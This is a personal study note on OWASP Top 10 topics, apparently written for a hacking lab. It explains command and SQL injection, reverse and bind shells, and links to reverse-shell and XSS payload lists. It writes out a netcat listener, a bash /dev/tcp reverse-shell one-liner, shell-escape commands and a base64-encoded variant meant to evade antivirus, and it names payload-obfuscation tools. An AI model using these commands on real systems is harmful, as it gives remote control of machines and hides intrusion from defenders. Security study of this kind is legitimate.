# OWASP TOP 10

## Resources:
reverse shell : https://www.stationx.net/reverse-shell-cheat-sheet/
terminal command to start server: sudo openvpn /home/avanish/Downloads/avanish.srivats.ovpn

## COMMAND INJECTION
user controlled input is interpreted as actual commands or parameters.

### TYPES:

SQL Injection: This occurs when user controlled input is passed to SQL queries.
As a result, an attacker can pass in SQL queries to manipulate the outcome of such queries. 

Command Injection: This occurs when user input is passed to system commands.
As a result, an attacker is able to execute arbitrary system commands on application servers.


### methods:
1)Reverse shell

Depending on what resources are available we change the tool weuse, given here only for bash,but inncludes python,perl etc.


ethical hacking and penetration testing, there are two types of shells: a reverse shell and a bind shell. 
A reverse shell is when the target machine connects back to the attacker's machine, which is listening for a connection, allowing the attacker to gain remote access to the target machine. On the other hand, a bind shell is when the target machine listens for incoming connections on a specified port, and the attacker machine connects to it.
wHAT IS A shell?
Simply put, the shell is a program that takes commands from the keyboard and gives them to the operating system to perform.
EX:
bash-bourne again shell
others: ksh, tcsh and zsh

a shell script is a file containing a series of commands

reverse shell attack steps:
starting a listener using netcat
nc -nvlp <port>
bash -i >& /dev/tcp/<ip>/<port> 0>&1
This BASH one-liner opens an interactive shell (-i) and redirects the input, output, and error streams to a TCP socket (IP and port) connected to the attacker's IP and port. The file descriptor 0>&1 links the input and output streams, permitting two-way communication between the attacker and the target.

THis is followed by a shell escape,which is escaping the conditions applied to the shell to get more priveleges.

Simple Shell Escape -  /bin/sh -i or /bin/bash -i
Echo Shell Escape  - echo os.system('/bin/bash')

Compiled shells are binary programs executed directly on the target system without an interpreter. 


MSFVenom is a powerful payload generation tool part of the Metasploit Framework. It can generate reverse shell payloads in various formats, including exe, elf, war, asp, and malicious DLL files. Staged and non-staged are two types of payloads generated by MSFVenom.

Obfuscation

Obfuscation is disguising or changing code to make it more difficult to understand, analyze, or reverse engineer. In reverse shells, obfuscation can help evade detection by security tools, such as antivirus software, intrusion detection systems, and firewalls.

bash -i >& /dev/tcp/<ip>/<port> 0>&1 | base64

obfuscate reverse shell code, such as Veil and Shelter


site for xss attacks: https://xss-payloads.paracyberbellum.io/payloads-list.html?s#category=system
